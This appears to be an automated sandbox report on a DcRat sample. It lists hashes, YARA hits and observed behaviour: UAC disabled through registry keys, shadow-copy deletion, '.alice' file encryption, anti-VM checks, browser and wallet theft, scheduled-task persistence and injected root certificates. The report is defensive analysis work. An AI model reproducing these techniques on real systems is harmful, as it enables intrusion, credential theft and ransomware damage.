Analysis
-
max time kernel
136s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
13-03-2023 09:29
Behavioral task
behavioral1
Sample
ec50388a69792d133c1298e1dceb40a6.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ec50388a69792d133c1298e1dceb40a6.exe
Resource
win10v2004-20230220-en
General
-
Target
ec50388a69792d133c1298e1dceb40a6.exe
-
Size
2.3MB
-
MD5
ec50388a69792d133c1298e1dceb40a6
-
SHA1
80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
-
SHA256
bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
-
SHA512
fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
SSDEEP
49152:PuxU6VfbIhv2/g8nn7HoqW2m86bzBvwv+P9gB8xy2LmQKV:Wi6VzIA/gg7IR8iVgB8xybQKV
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1288 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1524 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 392 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1332 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 844 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1092 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1876 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1508 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 608 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 792 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 580 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1432 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1928 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 588 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2016 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 984 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1684 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1744 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1288 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1276 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1996 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 976 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1448 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 840 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 748 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2044 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1332 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1200 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1956 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1376 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 928 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 392 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 516 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1660 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2016 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 936 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 580 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 588 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2028 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 920 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1184 612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1508 612 schtasks.exe -
Processes:
ec50388a69792d133c1298e1dceb40a6.exeIdle.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Idle.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Idle.exe -
Processes:
resource yara_rule behavioral1/memory/1972-57-0x0000000000F00000-0x00000000015D6000-memory.dmp dcrat behavioral1/memory/1972-361-0x0000000000F00000-0x00000000015D6000-memory.dmp dcrat behavioral1/memory/2536-472-0x0000000000020000-0x00000000006F6000-memory.dmp dcrat -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeIdle.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec50388a69792d133c1298e1dceb40a6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Idle.exe -
Downloads MZ/PE file
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
AppLaunch.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ExitUnregister.tif.alice AppLaunch.exe File renamed C:\Users\Admin\Pictures\MeasureSelect.png => C:\Users\Admin\Pictures\MeasureSelect.png.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\MeasureSelect.png.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\StopPush.png.alice AppLaunch.exe File renamed C:\Users\Admin\Pictures\DebugUnlock.tiff => C:\Users\Admin\Pictures\DebugUnlock.tiff.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\DebugUnlock.tiff.alice AppLaunch.exe File renamed C:\Users\Admin\Pictures\ExitUnregister.tif => C:\Users\Admin\Pictures\ExitUnregister.tif.alice AppLaunch.exe File renamed C:\Users\Admin\Pictures\StopPush.png => C:\Users\Admin\Pictures\StopPush.png.alice AppLaunch.exe File opened for modification C:\Users\Admin\Pictures\DebugUnlock.tiff AppLaunch.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
ec50388a69792d133c1298e1dceb40a6.exeIdle.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Idle.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Idle.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec50388a69792d133c1298e1dceb40a6.exe -
Executes dropped EXE 4 IoCs
Processes:
Idle.exem.exeh.exemm.exepid process 2536 Idle.exe 1596 m.exe 2060 h.exe 2908 mm.exe -
Loads dropped DLL 4 IoCs
Processes:
cmd.exeIdle.exepid process 2212 cmd.exe 2536 Idle.exe 2536 Idle.exe 2536 Idle.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/1972-57-0x0000000000F00000-0x00000000015D6000-memory.dmp themida C:\Recovery\48dcfae2-b1a4-11ed-9bb2-cee1c2fbb193\sppsvc.exe themida C:\Program Files\Windows Journal\it-IT\RCX302D.tmp themida behavioral1/memory/1972-361-0x0000000000F00000-0x00000000015D6000-memory.dmp themida \MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe themida C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe themida C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\Idle.exe themida behavioral1/memory/2536-472-0x0000000000020000-0x00000000006F6000-memory.dmp themida -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Processes:
Idle.exeec50388a69792d133c1298e1dceb40a6.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Idle.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ec50388a69792d133c1298e1dceb40a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec50388a69792d133c1298e1dceb40a6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Idle.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
AppLaunch.exedescription ioc process File opened (read-only) \??\O: AppLaunch.exe File opened (read-only) \??\F: AppLaunch.exe File opened (read-only) \??\N: AppLaunch.exe File opened (read-only) \??\T: AppLaunch.exe File opened (read-only) \??\Y: AppLaunch.exe File opened (read-only) \??\P: AppLaunch.exe File opened (read-only) \??\S: AppLaunch.exe File opened (read-only) \??\L: AppLaunch.exe File opened (read-only) \??\B: AppLaunch.exe File opened (read-only) \??\M: AppLaunch.exe File opened (read-only) \??\Q: AppLaunch.exe File opened (read-only) \??\W: AppLaunch.exe File opened (read-only) \??\E: AppLaunch.exe File opened (read-only) \??\J: AppLaunch.exe File opened (read-only) \??\K: AppLaunch.exe File opened (read-only) \??\V: AppLaunch.exe File opened (read-only) \??\Z: AppLaunch.exe File opened (read-only) \??\X: AppLaunch.exe File opened (read-only) \??\R: AppLaunch.exe File opened (read-only) \??\U: AppLaunch.exe File opened (read-only) \??\I: AppLaunch.exe File opened (read-only) \??\A: AppLaunch.exe File opened (read-only) \??\G: AppLaunch.exe File opened (read-only) \??\H: AppLaunch.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 6 ipinfo.io 7 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exeIdle.exepid process 1972 ec50388a69792d133c1298e1dceb40a6.exe 2536 Idle.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
h.exem.exedescription pid process target process PID 2060 set thread context of 1564 2060 h.exe AppLaunch.exe PID 1596 set thread context of 1732 1596 m.exe vbc.exe -
Drops file in Program Files directory 24 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exedescription ioc process File opened for modification C:\Program Files\Windows Portable Devices\RCX3481.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Portable Devices\RCX3492.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Portable Devices\lsass.exe ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\System.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\6203df4a6bafc7 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Journal\it-IT\RCX301C.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX5D39.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX61BD.tmp ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files\Windows Sidebar\en-US\27d1bcfc3c54e0 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\lsass.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files\Windows Portable Devices\6203df4a6bafc7 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Sidebar\en-US\System.exe ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Sidebar\en-US\RCX4730.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\RCX4FF9.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Internet Explorer\fr-FR\RCX500A.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Journal\it-IT\csrss.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files\Windows Journal\it-IT\886983d96e3d3e ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\cc11b995f2a76d ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Journal\it-IT\RCX302D.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files\Windows Sidebar\en-US\RCX471F.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\RCX5D59.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\RCX61CE.tmp ec50388a69792d133c1298e1dceb40a6.exe File created C:\Program Files\Internet Explorer\fr-FR\27d1bcfc3c54e0 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\fr-FR\winlogon.exe ec50388a69792d133c1298e1dceb40a6.exe -
Drops file in Windows directory 8 IoCs
Processes:
ec50388a69792d133c1298e1dceb40a6.exedescription ioc process File opened for modification C:\Windows\Cursors\RCX6632.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\Cursors\RCX6662.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\Fonts\spoolsv.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Windows\Fonts\f3b6ecef712a24 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\Cursors\smss.exe ec50388a69792d133c1298e1dceb40a6.exe File created C:\Windows\Cursors\69ddcba757bf72 ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\Fonts\RCX42AB.tmp ec50388a69792d133c1298e1dceb40a6.exe File opened for modification C:\Windows\Fonts\RCX42BB.tmp ec50388a69792d133c1298e1dceb40a6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 55 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1332 schtasks.exe 1992 schtasks.exe 1092 schtasks.exe 996 schtasks.exe 832 schtasks.exe 2024 schtasks.exe 1376 schtasks.exe 1396 schtasks.exe 2044 schtasks.exe 928 schtasks.exe 2024 schtasks.exe 844 schtasks.exe 1744 schtasks.exe 2020 schtasks.exe 1276 schtasks.exe 316 schtasks.exe 1200 schtasks.exe 1924 schtasks.exe 792 schtasks.exe 392 schtasks.exe 1432 schtasks.exe 840 schtasks.exe 1508 schtasks.exe 1524 schtasks.exe 1996 schtasks.exe 2016 schtasks.exe 580 schtasks.exe 588 schtasks.exe 1184 schtasks.exe 1876 schtasks.exe 516 schtasks.exe 1928 schtasks.exe 1448 schtasks.exe 1660 schtasks.exe 1288 schtasks.exe 392 schtasks.exe 1680 schtasks.exe 588 schtasks.exe 1288 schtasks.exe 748 schtasks.exe 1332 schtasks.exe 1508 schtasks.exe 2016 schtasks.exe 2080 schtasks.exe 608 schtasks.exe 1396 schtasks.exe 2024 schtasks.exe 2028 schtasks.exe 580 schtasks.exe 1684 schtasks.exe 1956 schtasks.exe 984 schtasks.exe 976 schtasks.exe 936 schtasks.exe 920 schtasks.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 3024 vssadmin.exe 2496 vssadmin.exe -
Processes:
Idle.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Idle.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Idle.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Idle.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Idle.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287